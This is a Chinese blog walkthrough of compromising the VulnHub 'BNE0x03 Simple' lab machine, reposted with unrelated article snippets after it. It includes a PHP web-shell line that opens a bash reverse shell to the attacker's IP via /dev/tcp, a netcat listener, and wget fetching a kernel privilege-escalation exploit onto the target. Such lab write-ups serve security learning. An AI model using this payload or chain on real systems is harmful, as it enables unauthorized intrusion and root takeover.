[VulnHub靶机渗透] BNE0x03 Simple

news2024/11/24 18:33:39
🍬 博主介绍

👨‍🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
✨主攻领域:【渗透领域】【应急响应】 【Java、PHP】 【VulnHub靶场复现】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!


目录

一、前言

一、信息收集

1、主机探测

2、端口扫描

3、漏洞扫描

4、目录扫描

二、信息收集+渗透测试

1、信息收集

2、上传木马,反弹shell

三、内核提权


一、前言

靶机精讲之BNE0x03Simple,CuteCMS2.0.3公开漏洞利用,超贴心的利用文件,将标准化的挖洞和渗透过程,几乎以手把手的方式教给你。这个内核提权还是比较麻烦的,很多人可能看完WP以后觉得这个内核提权很简单,实际上是比较复杂的,因为这需要我们一个一个去尝试,在这个过程中肯定有人会觉得很无聊枯燥,但这就是实战中很常见的渗透测试方式!

一、信息收集

1、主机探测

利用arp嗅探,发现靶机的IP地址是192.168.103.162

┌──(root💀kali)-[~]
└─# arp-scan -l

2、端口扫描

通过nmap端口扫描发现靶机只开放了80端口,那么毫无疑问我们的渗透重心肯定是web方向

┌──(root💀kali)-[~]
└─# nmap -sS -A -p- 192.168.103.162

通过nmap扫描UDP端口,也没有什么有价值的信息

┌──(root💀kali)-[~]
└─# nmap -sU --top-port 20 192.168.103.162

3、漏洞扫描

漏洞扫描结束,发现扫描结果显示可能存在csrf漏洞以及CVE-2007-6750漏洞,其中CVE-2007-6750我上网查找资料发现,这个漏洞是类似让你的web页面停止访问,对于我们这里渗透测试靶机提权没有什么帮助,感兴趣的师傅们可以尝试下。

┌──(root💀kali)-[~]
└─# nmap --script=vuln -p80 192.168.103.162

--script=vuln是nmap自带的漏洞扫描参数

4、目录扫描

我们这里直接信息收集一把梭了,直接把目录也给一起扫描,然后再去分析80端口的web页面

扫描发现靶机的目录呦:/docs、/uploads、/skins、/core、/cdata,所以的目录都挖掘完了以后,都没有发现什么特别有价值的信息,但是/uploads目录,我觉得他没有那么简单,既然给了我们这个目录,我觉得后面应该用的上。

┌──(root💀kali)-[~]
└─# gobuster dir -u http://192.168.103.162 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

二、信息收集+渗透测试

1、信息收集

我们直接访问web页面,发现是个登录页面,但是在web页面上,可以看到CuteNews v.2.0.3,这个应该是CuteNews框架的版本号,像这种是很容易爆洞的,因为版本很低,我们可以上网进行查找。

发现exploit里面存在这个框架漏洞,那就好办了,我们直接查看下这个exp

发现这里有复现这个框架漏洞的步骤,还是很详细的

2、上传木马,反弹shell

我们先注册一个账号

然后再点击这个

我们就来到了exp里面说的可以上传木马的地方

然后上传一个.jpg的木马图片,然后利用burp抓包绕过改php后缀

木马如下,IP是kali的IP地址

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.103.129/1234 0>&1'"); ?>

木马图片上传成功,我们再把后缀改成php木马文件的后缀,然后go一下,上传成功了

木马上传成功了,那么我们现在肯定得找木马的存放位置,然后利用kali进行反弹shell,有两个方法,其中第一个就是我们可以直接右击上传的那个图片,然后查看上传的位置

还有就是师傅们还记得开始我们扫描目录有个upload/目录,这个就是这个上传点的目录位置,发现我们上传的php木马文件。

我们先利用kali监听,然后再利用upload目录反弹shell,发现反弹shell成功了

┌──(root💀kali)-[~]
└─# nc -lvnp 1234

三、内核提权

进入靶机,发现是个低权限的用户,那么我们就要进行提权了,这里我尝试了一般的提权方法,比如SUID提权和sudo -l 命令以及查看进程都没有发现可以提权的点。

这里我们想想,我们开始进入靶机,拿到shell是因为这个框架漏洞版本太低,那么我们进行提取操作的时候,是不是也可以利用这点呢,我直接uname -a 查看内核版本信息,好家伙还真是,这个内核版本确实低,可以被我们所利用,但是内核提权需要我们进行尝试,很不简单!

www-data@simple:/home/bull$ uname -a
uname -a
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux

我们进行searchspoit搜索对应版本的提取漏洞,现在就是只能靠自己一个一个去尝试了,后来我发现试了很多个都没有,但是我看靶机的内核有ubantu,我就尝试再匹配ubantu关键字。

searchsploit kernel 3.16.0-generic |grep "Privilege Escalation"

但是发现尝试了多个,也还是没有什么突破,后来看了红队大佬的笔记,说是查看ubantu 14.0的内核提权,那么我们这里就试试红队大佬的方法,因为内核提权就是这样的,有点靠运气的成分了,就得看我们检索的关键字是什么了,然后还得挨个去尝试!

┌──(root💀kali)-[~/桌面]
└─# searchsploit kernel 3.16-generic |grep "Privilege Escalation" |grep Ubuntu

我们这里就按红队大佬的检索方法,查看ubantu14.0的内核提权方法,其中“Privilege Escalation”是权限提升的意思,就是检索可以从普通用户的权限提升至root权限。

┌──(root💀kali)-[~/桌面/cms]
└─# searchsploit Ubuntu 14.04 |grep "Privilege Escalation"

那么接下来我们就是挨个进行尝试了,我们从第一个开始下载,这里靶机下载我们的提权脚本的时候可以利用PHP开启http服务

┌──(root💀kali)-[~/桌面/cms]
└─# searchsploit -m 37088.c 

┌──(root💀kali)-[~/桌面/cms]
└─# php -S 0:6666

我们可以cat查看这个脚本,我们这里直接把脚本命令改下,跟命令上的一样,方便我们后面执行

┌──(root💀kali)-[~/桌面/cms]
└─# mv 37088.c apport-race.c

然后就是靶场利用wget命令下载脚本文件执行了,这里给大家提示下,我们下载执行脚本之前,最好是在/tmp目录下,因为权限的问题。

wget http://192.168.103.129:6666/apport-race.c

我们发现执行完命令以后,成功提权并且拿到了flag了。

# cat flag.txt
U wyn teh Interwebs!!1eleven11!!1!
Hack the planet!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1522426.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

智慧交通:构建智慧城市的重要一环

随着信息技术的飞速发展&#xff0c;智慧城市已成为现代城市发展的重要方向。作为智慧城市的重要组成部分&#xff0c;智慧交通以其高效、便捷、环保的特性&#xff0c;成为推动城市现代化进程的关键力量。本文将从智慧交通的概念、发展现状、面临挑战以及未来趋势等方面&#…

以题为例浅谈文件包含

什么叫做文件包含 文件包含函数加载的参数没有经过过滤或严格定义&#xff0c;可以被用户控制&#xff0c; 包含其他恶意文件&#xff0c;导致了执行非预期代码。 文件包含漏洞&#xff08;File Inclusion Vulnerability&#xff09;是一种常见的网络安全漏洞&#xff0c;它允…

HTML5CSS3提高导读

HTML5CSS3提高导读 2024/2/20 HTML5 的新增特性主要是针对于以前的不足&#xff0c;增加了一些新的标签、新的表单和新的表单属性等。 这些新特性都有兼容性问题&#xff0c;基本是 IE9 以上版本的浏览器才支持&#xff0c;如果不考虑兼容性问题&#xff0c;可以大量使用这 …

瑞熙贝通实验室安全培训考试系统

一、系统概述 瑞熙贝通实验室安全培训考试系统是一种基于互联网和人工智能技术的在线考试平台&#xff0c;旨在旨在提供实验室安全教育和考核的全面解决方案。该系统可以帮助实现实验室安全培训考试的在线化、智能化和规范化&#xff0c;提高实验室安全意识和能力&#xff0c;…

计算机网络——物理层(编码与调制)

计算机网络——编码与调制 基带信号和宽带信号编码与调制数字数据编码为数字信号非归零编码归零编码反向不归零编码曼彻斯特编码差分曼彻斯特编码4B/5B编码 数字数据调制为模拟信号模拟数据编码为数字信号模拟数据调制为模拟信号 我们之前讲了物理层的一些基础知识和两个准则&a…

vite打包时发布时,放在服务器的二级目录中

方式一 hash模式 如果我们的站点根目录为 public , 我们访问的时候使用的是 http://www.abc.com/ 访问到了站点的根目当&#xff0c;现在我们要访问 http://www.abc.com/mysite/#/ 配置如下 修改 vite.config.js base:“/mysite/” 修改 router中的配置 上面的步骤完成&…

Luckysheet + Exceljs:H5实现Excel在线编辑、导入、导出及上传服务器的示例代码(完整版demo)

创建xeditor.html <!DOCTYPE html> <html><head><meta charset"UTF-8" /><title>Hello World!</title><!-- <link relstylesheet href./luckysheet/plugins/css/pluginsCss.css /><link relstylesheet href./luck…

[游戏开发][UE5.3]GAS学习心得

GAS(GameplayAbilitySystem) UE提供的一套技能框架&#xff0c;这个框架也不是万能的&#xff0c;甚至各个部件你要进行封装开发&#xff0c;但这也比你从头写一套技能框架要容易很多。 GAS功能极其强大&#xff0c;所以它是一个庞大的系统&#xff0c;如果想运用得当&#x…

【刷题训练】牛客:JZ31 栈的压入、弹出序列

文章目录 一、题目要求二、解题思路三、C代码四、注意点五、运行成功 一、题目要求 二、解题思路 题意解读。本道题给定了两个序列pushV和popV&#xff0c;其中序列pushV是入栈顺序&#xff0c;popV是出栈顺序。问题就是让我们去判断这个popV的顺序是否可能是pushV的弹出顺序。…

瑞_Redis_短信登录(二)

文章目录 项目介绍1.1 项目准备1.2 基于Session实现登录流程1.2.1 发送短信验证码1.2.2 短信验证码登录、注册1.2.3 校验登录状态 1.3 实现发送短信验证码功能1.3.1 页面流程1.3.2 代码实现 1.41.51.6 &#x1f64a; 前言&#xff1a;本文章为瑞_系列专栏之《Redis》的实战篇的…

【LeetCode热题100】148. 排序链表(链表)

一.题目要求 给你链表的头结点 head &#xff0c;请将其按 升序 排列并返回 排序后的链表 。 二.题目难度 中等 三.输入样例 示例 1&#xff1a; 输入&#xff1a;head [4,2,1,3] 输出&#xff1a;[1,2,3,4] 示例 2&#xff1a; 输入&#xff1a;head [-1,5,3,4,0] 输…

知名Web3投资基金a16z合伙人Jane Lippencott确认出席Hack.Summit() 2024区块链开发者大会

在区块链技术的风起云涌和Web3生态的蓬勃发展中&#xff0c;知名a16z Crypto的合伙人Jane Lippencott已确认出席即将于2024年4月9日至10日在香港数码港举行的Hack.Summit() 2024区块链开发者大会。作为亚洲首次举办的Hack.Summit()&#xff0c;此次大会将为全球区块链开发者及业…

DFS的一些题目

题目1&#xff1a;奶牛选美 这道题其实就是把两个连通块合成一个&#xff0c;可以用dfs、bfs和并查集。因为最近在dfs专题训练&#xff0c;这里我只写了dfs。 首先我们用dfs的方式遍历两个连通块&#xff0c;将两个连通块中点的坐标分别存入两个数组中&#xff0c;将这两个数组…

openssl3.2 - note - Writing OpenSSL Provider Skeleton

文章目录 openssl3.2 - note - Writing OpenSSL Provider Skeleton概述笔记测试工程的建立复现的provider工程总结Provider包含的头文件openssl/core.h中的数据结构实现 OSSL_provider_init()看一下openssl自带的提供者provider的openssl命令行测试provider的本质是hook了opens…

pytorch 入门基础知识一(Pytorch 01)

一 深度学习基础相关 深度学习三个主要的方向&#xff1a;计算机视觉&#xff0c;自然语言&#xff0c;语音识别。 机器学习核心组件&#xff1a;1 数据集(data)&#xff0c;2 前向传播的model(net)&#xff0c;3 目标函数(loss)&#xff0c; 4 调整模型参数和优化函数的算法…

【研发管理】产品经理-基础认知

导读&#xff1a;产品经理&#xff08;Product Manager&#xff09;是一个负责产品的全周期管理的职位&#xff0c;他们不仅参与产品的设计、开发、推广和销售&#xff0c;还涉及到产品的市场调研、用户需求分析、竞争分析、产品规划、产品测试以及后续的产品迭代等多个环节。产…

安装snap再安装flutter再安装localsend@Ubuntu(FreeBSD下未成功)

Localsend介绍 localsend是一个跨平台的文件传送软件&#xff0c;可以在Windows、MacOS、Linux、Android和IOS下互相传送文件&#xff0c;只要在同一个局域网即可。 localsend官网&#xff1a;LocalSend 尝试安装localsend&#xff0c;发现需要使用flutter&#xff0c; 安装f…

【AI】Ubuntu系统深度学习框架的神经网络图绘制

一、Graphviz 在Ubuntu上安装Graphviz&#xff0c;可以使用命令行工具apt进行安装。 安装Graphviz的步骤相对简单。打开终端&#xff0c;输入以下命令更新软件包列表&#xff1a;sudo apt update。之后&#xff0c;使用命令sudo apt install graphviz来安装Graphviz软件包。为…

挑战杯 机器视觉人体跌倒检测系统 - opencv python

0 前言 &#x1f525; 优质竞赛项目系列&#xff0c;今天要分享的是 &#x1f6a9; 机器视觉人体跌倒检测系统 该项目较为新颖&#xff0c;适合作为竞赛课题方向&#xff0c;学长非常推荐&#xff01; &#x1f947;学长这里给一个题目综合评分(每项满分5分) 难度系数&…

前端之CSS 创建css--行内引入、内联样式、外联样式

创建css有三种创建样式&#xff0c;行内引入、内联引入、外联引入。 行内引入 在行内标签引入 <!DOCTYPE html> <html lang"en"> <head><meta charset"UTF-8"><title>行内样式</title> </head> <body>…